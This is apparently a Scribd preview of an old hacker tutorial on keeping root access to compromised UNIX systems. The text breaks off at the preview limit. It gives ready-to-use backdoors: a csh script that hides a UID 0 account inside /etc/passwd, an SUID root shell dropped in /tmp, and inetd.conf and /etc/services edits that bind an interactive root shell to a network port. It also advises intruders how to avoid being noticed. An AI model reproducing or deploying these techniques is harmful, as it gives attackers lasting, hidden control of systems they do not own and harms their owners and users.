Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Standard view
Full view
of .
Save to My Library
Look up keyword
Like this
0 of .
Results for:
No results containing your search query
P. 1


Ratings: (0)|Views: 7 |Likes:
Published by mobilecrackers

More info:

Published by: mobilecrackers on Jul 14, 2012
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as TXT, PDF, TXT or read online from Scribd
See more
See less





Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrectpermissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-userprivilege you have worked so hard to achieve....?This article is intended to show you how to hold onto root once you have it. Itis intended for hackers and administrators alike.From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Everwonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from yoursystem?This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there areways into one.BeforehandKnow the location of critical system files. This should be obvious (If you can'tlist any of the top of your head, stop readingnow, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 fieldformat, system specific naming conventions, shadowing mechanisms, etc...). Knowvi. Many systems will not have thoserobust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. Ifyou are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always niceto have a robust terminal program that has anice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...The permenance of these backdoors will depend completely on the technical saavyof the administrator. The experienced andskilled administrator will be wise to many (if not all) of these backdoors. But,if you have managed to steal root, it is likely theadmin isn't as skilled (or up to date on bug reports) as she should be, and manyof these doors may be in place for some timeto come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will belooking for back doors.The Overt[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. Itflies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simplyprepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...#!/bin/csh# Inserts a UID 0 account into the middle of the passwd file.# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.comset linecount = `wc -l /etc/passwd`cd # Do this at home.cp /etc/passwd ./temppass # Safety first.echo passwd file has $linecount[1] lines.@ linecount[1] /= 2@ linecount[1] += 1 # we only want 2 temp filesecho Creating two files, $linecount[1] lines each \(or approximately that\).split -$linecount[1] ./temppass # passwd string optionalecho "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaacat ./xab >> ./xaamv ./xaa /etc/passwdchmod 644 /etc/passwd # or whatever it was beforehandrm ./xa* ./temppassecho Done...NEVER, EVER, change the root password. The reasons are obvious.[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in thepasswd file has been abandoned, and disabled by the sysadmin. Change her UID to0 (and remove the '*' from the secondfield).[3] Leave an SUID root shell in /tmp.#!/bin/sh# Everyone's favorite...cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...chmod 4755 /tmp/.evilnaughtyshellMany systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon areboot. Many systems have /tmp mountedto disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people maynotice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite systemspecific. Check out /var/spool/cron/crontabs/root and /etc/fstab.The Veiled[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, somebackground info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns theappropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typicallines look like this:(1) (2) (3) (4) (5) (6) (7)ftp stream tcp nowait root /usr/etc/ftpd ftpdtalk dgram udp wait root /usr/etc/ntalkd ntalkdField (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determinewhich port it should associate the program name with. (2) tells inetd which type
of socket connection the daemon will expect.TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field whichis either of the two transport protocols, TCPor UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server willprocess a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn achild process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or moreinportantly, the UID) that the daemon is run as. (6) is the program to run whena connection arrives, and (7) is the actualcommand (and optional arguments). If the program is trivial (usally requiring nouser interaction) inetd may handle it internally.This is done with an 'internal' flag in fields (6) and (7).So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle itwith something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwdfile, etc...For the insinuation-impaired, try this:Open the /etc/inetd.conf in an available editor. Find the line that reads:daytime stream tcp nowait root internaland change it to:daytime stream tcp nowait /bin/sh sh -i.You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill andrestart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good ideato do this off peak hours).[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. Onesimple solution is to set up a shell the runs similar to the above backdoor. Youneed to make sure the entry appears in/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:(1) (2)/(3) (4)smtp 25/tcp mailField (1) is the service, field (2) is the port number, (3) is the protocol typethe service expects, and (4) is the common nameassociated with the service. For instance, add this line to /etc/services:evil 22/tcp eviland this line to /etc/inetd.conf:evil stream tcp nowait /bin/sh sh -iRestart inetd as before.Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->